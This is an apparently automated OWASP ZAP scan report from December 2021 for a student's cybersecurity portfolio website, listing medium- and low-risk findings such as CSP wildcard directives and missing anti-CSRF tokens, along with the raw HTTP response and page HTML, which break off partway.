ZAP Scanning Report

Generated with ZAP on Mon 6 Dec 2021, at 10:58:19

Contents

About this report

Report parameters

Contexts

No contexts were selected, so all contexts were included by default.

Sites

The following sites were included:

  • https://beekmans.dev

(If no sites were selected, all sites were included by default.)

An included site must also be within one of the included contexts for its data to be included in the report.

Risk levels

Included: High, Medium, Low, Informational

Excluded: None

Confidence levels

Included: User Confirmed, High, Medium, Low

Excluded: User Confirmed, High, Medium, Low, False Positive

Summaries

Alert counts by risk and confidence

This table shows the number of alerts for each level of risk and confidence included in the report.

(The percentages in brackets represent the count as a percentage of the total number of alerts included in the report, rounded to one decimal place.)

Confidence
User Confirmed High Medium Low Total
Risk High 0
(0.0%)
0
(0.0%)
0
(0.0%)
0
(0.0%)
0
(0.0%)
Medium 0
(0.0%)
0
(0.0%)
11
(14.1%)
0
(0.0%)
11
(14.1%)
Low 0
(0.0%)
0
(0.0%)
9
(11.5%)
52
(66.7%)
61
(78.2%)
Informational 0
(0.0%)
0
(0.0%)
2
(2.6%)
4
(5.1%)
6
(7.7%)
Total 0
(0.0%)
0
(0.0%)
22
(28.2%)
56
(71.8%)
78
(100%)

Alert counts by site and risk

This table shows, for each site for which one or more alerts were raised, the number of alerts raised at each risk level.

Alerts with a confidence level of "False Positive" have been excluded from these counts.

(The numbers in brackets are the number of alerts raised for the site at or above that risk level.)

Risk
High
(= High)
Medium
(>= Medium)
Low
(>= Low)
Informational
(>= Informational)
Site https://beekmans.dev 0
(0)
11
(11)
61
(72)
6
(78)

Alert counts by alert type

This table shows the number of alerts of each alert type, together with the alert type's risk level.

(The percentages in brackets represent each count as a percentage, rounded to one decimal place, of the total number of alerts included in this report.)

Alert type Risk Count
CSP: Wildcard Directive Medium 9
(11.5%)
Vulnerable JS Library Medium 2
(2.6%)
Absence of Anti-CSRF Tokens Low 2
(2.6%)
Cross-Domain JavaScript Source File Inclusion Low 2
(2.6%)
Incomplete or No Cache-control Header Set Low 3
(3.8%)
Private IP Disclosure Low 2
(2.6%)
Timestamp Disclosure - Unix Low 52
(66.7%)
Content-Type Header Missing Informational 2
(2.6%)
Information Disclosure - Suspicious Comments Informational 4
(5.1%)
Total 78

Alerts

  1. Risk=Medium, Confidence=Medium (11)

    1. https://beekmans.dev (11)

      1. CSP: Wildcard Directive (9)
        1. GET https://beekmans.dev
          Alert tags
          Alert description

          The following directives either allow wildcard sources (or ancestors), are not defined, or are overly broadly defined:

          script-src, style-src, img-src, connects-src, frame-src, frame-ancestors, font-src, media-src, object-src, manifest-src, worker-src, prefetch-src, form-action

          The directive(s): frame-ancestors, form-action are among the directives that do not fallback to default-src, missing/excluding them is the same as allowing anything.

          Request
          Request line and header section (192 bytes)
          GET https://beekmans.dev HTTP/1.1
          Host: beekmans.dev
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
          Pragma: no-cache
          Cache-Control: no-cache
          
          
          Request body (0 bytes)
          Response
          Status line and header section (1047 bytes)
          HTTP/1.1 200 OK
          Date: Mon, 06 Dec 2021 09:55:11 GMT
          Content-Type: text/html; charset=UTF-8
          Connection: keep-alive
          vary: Accept-Encoding
          content-security-policy: default-src 'self' http: https: data: blob: 'unsafe-inline'
          x-frame-options: SAMEORIGIN
          x-xss-protection: 1; mode=block
          x-content-type-options: nosniff
          referrer-policy: no-referrer-when-downgrade
          strict-transport-security: max-age=31536000; includeSubDomains; preload
          CF-Cache-Status: DYNAMIC
          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4lOrbKK8y%2Bn8QLhKEGpB7rePrCHT1J%2BQaOZJP06h5%2BW2GkK9CRq%2Fdn7ChLzJzoJLiDaKfMYCpMPOGx7ddQ5eVNaVcohEeYRecx%2BV4c%2BapqYy04o6ANFaN3V3sF2rfmk%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 6b94a31e5f8a4c13-AMS
          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
          
          
          Response body (178340 bytes)
          <!DOCTYPE html>
          <html lang="en">
          <head>
          <meta charset="utf-8">
          <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
          <meta name="description" content="">
          <meta name="author" content="">
          <title>Cyber portfolio</title>
          
          <link href="vendor/bootstrap/css/bootstrap.min.css" rel="stylesheet">
          
          <link href="vendor/fontawesome-free/css/all.min.css" rel="stylesheet" type="text/css">
          <link href="https://fonts.googleapis.com/css?family=Montserrat:400,700" rel="stylesheet" type="text/css">
          <link href='https://fonts.googleapis.com/css?family=Kaushan+Script' rel='stylesheet' type='text/css'>
          <link href='https://fonts.googleapis.com/css?family=Droid+Serif:400,700,400italic,700italic' rel='stylesheet' type='text/css'>
          <link href='https://fonts.googleapis.com/css?family=Roboto+Slab:400,100,300,700' rel='stylesheet' type='text/css'>
          
          <link href="css/agency.min.css" rel="stylesheet">
          </head>
          <body id="page-top">
          
          <nav class="navbar navbar-expand-lg navbar-dark fixed-top" id="mainNav">
          <div class="container">
          <a class="navbar-brand js-scroll-trigger" href="#page-top">Cyber security</a>
          <button class="navbar-toggler navbar-toggler-right" type="button" data-toggle="collapse" data-target="#navbarResponsive" aria-controls="navbarResponsive" aria-expanded="false" aria-label="Toggle navigation">
          Menu
          <i class="fas fa-bars"></i>
          </button>
          <div class="collapse navbar-collapse" id="navbarResponsive">
          <ul class="navbar-nav text-uppercase ml-auto">
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#services">Services</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#portfolio">Portfolio</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#about">About</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#team">Team</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#contact">Contact</a>
          </li>
          </ul>
          </div>
          </div>
          </nav>
          
          <header class="masthead">
          <div class="container">
          <div class="intro-text">
          <div class="intro-lead-in">Welcome To My Portfolio!</div>
          <div class="intro-heading text-uppercase">It's Nice To Meet You</div>
          <a class="btn btn-primary btn-xl text-uppercase js-scroll-trigger" href="#services">Tell Me More</a>
          </div>
          </div>
          </header>
          
          <section id="services">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">Introduction</h2>
          <h3 class="section-subheading text-muted">My project.</h3>
          </div>
          </div>
          <div class="row text-center">
          <div class="col-md-4">
          <span class="fa-stack fa-4x">
          <i class="fas fa-circle fa-stack-2x text-primary"></i>
          <i class="fas fa-shopping-cart fa-stack-1x fa-inverse"></i>
          </span>
          <h4 class="service-heading">Environment</h4>
          <p class="text-muted">I'm using my own Hyper visor (Microsoft's Hyper-V) on a private server in my home. I can connect via a VPN that's also running on this server to my home network to remotely manage the server and manage and deploy VM's. The server is an old DELL T310 with a Xeon x3440, 24GB ddr3 registered ecc 1333mhz memory and all VM's are installed on a Crucial MX500 ssd. The server is part of the home network just like every other computer in my home.</p>
          </div>
          <div class="col-md-4">
          <span class="fa-stack fa-4x">
          <i class="fas fa-circle fa-stack-2x text-primary"></i>
          <i class="fas fa-laptop fa-stack-1x fa-inverse"></i>
          </span>
          <h4 class="service-heading">Context</h4>
          <p class="text-muted">The network I'm building has as focus a webhosting company with some onsite employee's maybe a place for guests and some webservers hosting different websites.</p>
          </div>
          <div class="col-md-4">
          <span class="fa-stack fa-4x">
          <i class="fas fa-circle fa-stack-2x text-primary"></i>
          <i class="fas fa-lock fa-stack-1x fa-inverse"></i>
          </span>
          <h4 class="service-heading">Security</h4>
          <p class="text-muted">The network is secured by separating the webservers from the employees and guests on their own VLAN. The network is protected by a pfsense router running custom firewalls for every interface and running Surricata to identify and block possible threats.</p>
          </div>
          </div>
          </div>
          </section>
          
          <section class="bg-light" id="portfolio">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">Portfolio</h2>
          <h3 class="section-subheading text-muted">Cyber security.</h3>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Blue teaming semester</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal1">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/01-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Self assessment week 1</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal2">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid portfolio-image" src="img/portfolio/blue/02-thumbnail.gif" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Network diagram V1</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal3">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/03-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Network diagram V2</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal4">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/04-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Secure connections</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal5">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/05-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">IDS/IPS</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal6">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/06-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Information Security and Risk Analysis</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal7">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/07-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">IT Monitoring</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Red teaming semester</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal8">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/08-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">SQL injection</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal9">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/09-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Command injection</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal10">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/10-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Cross-site scripting</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal11">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/11-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Cross-site request forgery</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal12">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/12-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Path traversal</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal13">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/13-thumbnail.jpeg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Password cracking</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal14">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/14-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Network scanning and enumeration</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal15">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/15-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Network sniffing and spoofing</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal16">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/16-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Law, Ethics and Responsible Disclosure</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal17">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
           </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/17-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Basic hacking process</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal18">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/18-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Self reflection</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Internship</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal19">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/internship/19-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S5</h4>
          <p class="text-muted">My internship</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Minor</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h5 class="section-subheading text-muted">Red teaming specialisation</h5>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal20">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/20-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Pentesting methods</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal21">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/21&22&31-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">HTB Linux write-up</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal22">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
           <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/21&22&31-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">HTB Windows write-up</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal23">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/23-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Red VS Blue Event</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal24">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis session</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal25">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/25-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Personal pen-test toolbox</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal26">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/26-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Security of IOT protocols and technology</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal27">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/27-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Pen-test at COMPANY_NAME_HERE</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal28">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis on a smartphone app</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal29">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis on a website</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal30">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis on a device</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal31">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/21&22&31-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Organize a weekly Hack The Box event</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h5 class="section-subheading text-muted">Blue teaming specialisation</h5>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal32">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/32-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Red VS Blue Event</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal33">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/33&37-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">IDS technologies</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal34">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/34-thumbnail.svg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Monitoring technologies</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal35">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/35-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">SIEM technologies</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal36">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/36-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Threat use cases</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal37">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/33&37-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Developing and tuning an IDS</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal38">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
           <img class="img-fluid" src="img/portfolio/minor/blue/38-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Setting up a SOC</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal39">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/39-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability scanning</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal40">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/40-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Security monitoring, analysis and triage</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h5 class="section-subheading text-muted">Forensics specialisation</h5>
          </div>
          </div>
          </div>
          </section>
          
          <section id="about">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">About</h2>
          <h3 class="section-subheading text-muted">My cyber security career.</h3>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12">
          <ul class="timeline">
          <li>
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/1.jpg" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S3 2019</h4>
          <h4 class="subheading">The beginning</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">This was the first time I got experienced the cyber security stream and what it had to offer. I learned the basics of the defensive side of cyber security.</p>
          </div>
          </div>
          </li>
          <li class="timeline-inverted">
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/2.jpg" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S4 2020</h4>
          <h4 class="subheading">Round 2</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">This was my second semester on cyber security this time focusing on the offensive side.</p>
          </div>
          </div>
          </li>
          <li>
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/3.png" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S5 2021</h4>
          <h4 class="subheading">The internship</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">Lorem ipsum dolor sit amet, consectetur adipisicing elit. Sunt ut voluptatum eius sapiente, totam reiciendis temporibus qui quibusdam, recusandae sit vero unde, sed, incidunt et ea quo dolore laudantium consectetur!</p>
          </div>
          </div>
          </li>
          <li class="timeline-inverted">
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/4.jpg" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S7 2021</h4>
          <h4 class="subheading">My minor</h4>
          </div>
